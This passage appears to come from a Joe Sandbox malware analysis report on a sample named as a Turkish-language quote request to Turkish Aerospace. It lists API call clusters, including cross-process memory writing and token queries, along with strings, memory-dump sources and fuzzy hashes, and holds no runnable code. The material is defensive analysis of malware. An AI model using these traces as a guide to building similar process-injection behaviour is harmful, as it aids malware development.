                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                    • Opcode ID: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                                                                                    • Instruction ID: d5a2af1e7cb9c9f741365accf5e54bf344affb8812d84a189f9999e58624aa3f
                                                                                                                                    • Opcode Fuzzy Hash: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                                                                                    • Instruction Fuzzy Hash: AF015735D0161EDBEF21EFE4EC48AEDBB78FF0A711F500086E981B2284CB3955508BA1
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: 731649a91f643c8c9d775f84d2a334672d337edc0525dad981c3e501f4f3751c
                                                                                                                                    • Instruction ID: dce1406d85799f23b518ea20350535b7105abd32591a2bf042c44db63bf9f6fe
                                                                                                                                    • Opcode Fuzzy Hash: 731649a91f643c8c9d775f84d2a334672d337edc0525dad981c3e501f4f3751c
                                                                                                                                    • Instruction Fuzzy Hash: E7F04471600305AFE7311E65DC88E773BBCEF457A4B200115F685C6150CB659952DB60
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FFC1F7
                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FFC20E
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FFC226
                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00FFC242
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00FFC25C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                    • Opcode ID: 55771d784ae4b1523da8c566ab5c79c260fb364aef1b54b286cc79a92ddf6e15
                                                                                                                                    • Instruction ID: e717cee9fd89924df6c73072dde9885b20ca4235f1118462634a7e80fa27b2be
                                                                                                                                    • Opcode Fuzzy Hash: 55771d784ae4b1523da8c566ab5c79c260fb364aef1b54b286cc79a92ddf6e15
                                                                                                                                    • Instruction Fuzzy Hash: 5901A73040431D97EB305F60DD4EFA67778FF04B05F00025DE682A14E1DBE96948AB90
                                                                                                                                    APIs
                                                                                                                                    • EndPath.GDI32(?), ref: 00FA13BF
                                                                                                                                    • StrokeAndFillPath.GDI32(?,?,00FDB888,00000000,?), ref: 00FA13DB
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FA13EE
                                                                                                                                    • DeleteObject.GDI32 ref: 00FA1401
                                                                                                                                    • StrokePath.GDI32(?), ref: 00FA141C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                    • Opcode ID: cdb3beba66225d3f7bc5106a2e293b3c40a96a025f193ebf62e33404110df5e1
                                                                                                                                    • Instruction ID: 57dc7cafb09e4d6a42daa2a0501f422c729ecf6cd4163000a60492c2e7bbee43
                                                                                                                                    • Opcode Fuzzy Hash: cdb3beba66225d3f7bc5106a2e293b3c40a96a025f193ebf62e33404110df5e1
                                                                                                                                    • Instruction Fuzzy Hash: A4F01D300003099FDB315F1AEC4C7583BB5BB023A6F188215F8A9584F8C73E4595DF10
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                      • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FA7A51: _memmove.LIBCMT ref: 00FA7AAB
                                                                                                                                    • __swprintf.LIBCMT ref: 00FB2ECD
                                                                                                                                    Strings
                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FB2D66
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                                    • Opcode ID: 4a49a595e7acc4a5369f3691a9fa763740e1eb48a5675bd5ca89656c31d2907c
                                                                                                                                    • Instruction ID: cbcbbb46fdfa2388337bbf243c470aa018e705b290d34bb57fe6bce9651005a1
                                                                                                                                    • Opcode Fuzzy Hash: 4a49a595e7acc4a5369f3691a9fa763740e1eb48a5675bd5ca89656c31d2907c
                                                                                                                                    • Instruction Fuzzy Hash: C8918C715083059FC714EF25CC86DAFB7A8EF9A760F00491DF4869B2A1DA38ED44EB52
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0100B9BB
                                                                                                                                    • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100B9D4
                                                                                                                                    • CoUninitialize.OLE32 ref: 0100B9F1
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                                    • Opcode ID: 5d1dfefac1699368011a1beca95cabcfda3761c981eb9892defc8e9326414ef1
                                                                                                                                    • Instruction ID: f85eab9002cd2c7423c150ba8667785a6997044e334df7b2eb0244005ccd01b5
                                                                                                                                    • Opcode Fuzzy Hash: 5d1dfefac1699368011a1beca95cabcfda3761c981eb9892defc8e9326414ef1
                                                                                                                                    • Instruction Fuzzy Hash: 1EA166746043059FD711DF14C884D2ABBE5FF8A314F048998F8999B3A2CB75ED45CB92
                                                                                                                                    APIs
                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00FC50AD
                                                                                                                                      • Part of subcall function 00FD00F0: __87except.LIBCMT ref: 00FD012B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                    • String ID: pow
                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                    • Opcode ID: 724fbf9af89edb304665ce0fc1747526685de383f4f78eacfc0484c9f3824baa
                                                                                                                                    • Instruction ID: 06b54c12e3c92cb5aa103d95bed9c4bde233c6e5073a48045ed5f005a08421a6
                                                                                                                                    • Opcode Fuzzy Hash: 724fbf9af89edb304665ce0fc1747526685de383f4f78eacfc0484c9f3824baa
                                                                                                                                    • Instruction Fuzzy Hash: A8518B71D0960386DB217624CE07B6E3B95AB40B20F28895EE4D5C6399DF399DC4BB82
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$_memmove
                                                                                                                                    • String ID: ERCP
                                                                                                                                    • API String ID: 2532777613-1384759551
                                                                                                                                    • Opcode ID: f6f4411607d113955e74c7c22b1e00fd4dcf52b3caeaa110d76729e821f0cf4d
                                                                                                                                    • Instruction ID: ef44bbb142230225388ddc156ec0046b40d864620693f5be7a3a8a48280d1dc2
                                                                                                                                    • Opcode Fuzzy Hash: f6f4411607d113955e74c7c22b1e00fd4dcf52b3caeaa110d76729e821f0cf4d
                                                                                                                                    • Instruction Fuzzy Hash: E8518171900309DBDB24DF55C941BEAB7E4EF44314F24456EE94AC7251EB38AA44EF50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 010014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF9296,?,?,00000034,00000800,?,00000034), ref: 010014E6
                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FF983F
                                                                                                                                      • Part of subcall function 01001487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010014B1
                                                                                                                                      • Part of subcall function 010013DE: GetWindowThreadProcessId.USER32(?,?), ref: 01001409
                                                                                                                                      • Part of subcall function 010013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 01001419
                                                                                                                                      • Part of subcall function 010013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 0100142F
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98AC
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98F9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                    • Opcode ID: 077dd7753ef405c330def0cf8a7cfad91a2fab9f47272ec323797bb042e95116
                                                                                                                                    • Instruction ID: e03f45c20a9a14169e61223093c9d8a3a2b49bfc1c679bde5464645b049767f8
                                                                                                                                    • Opcode Fuzzy Hash: 077dd7753ef405c330def0cf8a7cfad91a2fab9f47272ec323797bb042e95116
                                                                                                                                    • Instruction Fuzzy Hash: AF415175D0011DAFDB21DFA4CC85EDEBB78EF09340F104059EA95B7190DA71AE45DBA0
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0102F910,00000000,?,?,?,?), ref: 010279DF
                                                                                                                                    • GetWindowLongW.USER32 ref: 010279FC
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01027A0C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long
                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                    • Opcode ID: 6bc9bed276708f0da4b652904ebf9cb2a89a5feda0a20b2dd2012acde7cba245
                                                                                                                                    • Instruction ID: 5854e28144877a7c73762753186045031b9f01cbc4f615cc7ac071c34f5191c7
                                                                                                                                    • Opcode Fuzzy Hash: 6bc9bed276708f0da4b652904ebf9cb2a89a5feda0a20b2dd2012acde7cba245
                                                                                                                                    • Instruction Fuzzy Hash: E431FE71200216ABEB618E38CC01BEB7BA9FB59334F204719F9B5A22E0D735E8508B50
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01027461
                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01027475
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01027499
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                    • Opcode ID: 589c8323e2f402848bb38913f7c9ab2666a13af545bc3ff711b71b187d47476a
                                                                                                                                    • Instruction ID: 263666db36516daf477a0c3fe2b1d5260b4ebe678a9126329e832b65f63f10bb
                                                                                                                                    • Opcode Fuzzy Hash: 589c8323e2f402848bb38913f7c9ab2666a13af545bc3ff711b71b187d47476a
                                                                                                                                    • Instruction Fuzzy Hash: A421A332500229ABDF268E64CC45FEA3BB9FF48724F110154FE956B1D0DB75A851DBA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01027C4A
                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01027C58
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01027C5F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                    • Opcode ID: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                                                                                    • Instruction ID: d51fd40abb26563977aeea93914d013071f42468182f93707a77890499ce0bdf
                                                                                                                                    • Opcode Fuzzy Hash: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                                                                                    • Instruction Fuzzy Hash: A82181B5600119AFEB21DF28DCC1DA737EDEF5A394B540059FA819B351CB36EC118BA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01026D3B
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01026D4B
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01026D70
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                    • String ID: Listbox
                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                    • Opcode ID: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                                                                                    • Instruction ID: eb9da11f1dc0f71398f338c068e8fcbf963351acfb768fa69867e60adb7eec0b
                                                                                                                                    • Opcode Fuzzy Hash: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                                                                                    • Instruction Fuzzy Hash: 6521B332600128BFDF229F58DC44FBB3BBAEB89750F118128F9859B191C6729C5187A0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01027772
                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01027787
                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01027794
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                    • Opcode ID: ecd303c9c196038dd254d1349b8b22f1f478aeb85d86c20f464d935ff7dd4057
                                                                                                                                    • Instruction ID: adb2d854bb4a12a08a64d338643f7b4ad5454754d9c25135d086e10b2a838086
                                                                                                                                    • Opcode Fuzzy Hash: ecd303c9c196038dd254d1349b8b22f1f478aeb85d86c20f464d935ff7dd4057
                                                                                                                                    • Instruction Fuzzy Hash: FB11E372240219BAEF205E65CC05FEB7BA9FF89B54F114528FA85A6090C672E411CB20
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4B83,?), ref: 00FA4C44
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4C56
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
